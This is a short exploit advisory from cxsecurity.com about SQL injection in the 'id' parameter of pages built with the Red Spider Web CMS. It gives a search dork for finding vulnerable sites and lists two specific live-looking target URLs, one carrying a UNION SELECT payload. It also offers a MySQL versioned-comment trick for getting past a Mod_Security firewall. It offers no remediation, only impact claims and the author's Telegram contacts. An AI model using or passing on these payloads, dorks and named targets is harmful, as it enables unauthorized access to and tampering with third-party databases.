R.s.W - Sql Injection

2025.12.14
Credit: Itqchi
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: "Developed by Red Spider Web"

********************************************************* # Exploit Title: SQL Injection – Red Spider Web CMS # Date: 2025-12-11 # Exploit Author: ITACHI - SELI # Category: Web Applications # Tested on: Windows 10 / Kali Linux CVE: Not Assigned ********************************************************* ##Summary : A SQL Injection vulnerability was discovered in multiple websites developed using the Red Spider Web CMS. The issue exists in the "id" parameter of pages like project.php, pic.php, and gallery.php, where user input is not properly sanitized. ********************************************************* ###Dom : https://www.jbshowrah.com/project.php?id=47'/*!50000UNION/**_**/*//*!50000SELECT/**_**/*/ database(),2,3--+ https://www.oarindia.org/gallery.php?id=1 ********************************************************* ####Waf : Mod_Security #####bypass waf : /*!50000UNION*/ ********************************************************* ###Vulnerability : The id parameter is directly passed into SQL queries without validation. Adding special characters (e.g., ') triggers SQL errors, confirming injection vulnerability. ********************************************************* Example test input : ?id=-1' ##Impact : Database information disclosure Possible authentication bypass Data manipulation or deletion Potential full database compromise

Referencje:

ITACHI – SELI telegram: @ir_itachi_ir Channel:
https://t.me/IR_ITACHI_1_UCHIHA_IR
Channel:
https://t.me/Selii_404
Email: IRITACHIUCHIHAIR@GMAIL.COM


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2025, cxsecurity.com

 

Back to Top